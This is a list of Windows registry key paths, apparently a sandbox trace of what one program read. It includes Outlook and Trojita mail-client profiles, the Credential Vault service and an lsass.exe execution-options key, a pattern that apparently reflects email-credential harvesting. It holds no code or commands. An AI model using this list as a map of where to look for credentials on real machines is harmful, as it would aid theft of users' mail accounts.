HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\SOFTWARE\flaska.net\trojita
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_USERS\S-1-5-18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Volatile Environment
HKEY_USERS\.DEFAULT\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Environment
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Volatile Environment
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\RequiredPrivileges
HKEY_CURRENT_USER\Software\Classes\AppID\taskhost.exe
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WDI\DiagnosticModules
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NameResource
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WDI\Config
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\Config\ServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\CLResolutionInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\DisplayInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\SkipWatson
HKEY_LOCAL_MACHINE\Software\Microsoft\RADAR\HeapLeakDetection\Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\Settings\ReflectionInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGenServiceDebugLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Client
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Client\Install
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGEN_USE_PRIVATE_STORE
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DefaultVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\ZapSet
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NetFramework\v2.0.50727\NGenService\Roots
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\NGENService\Roots\WorkPending
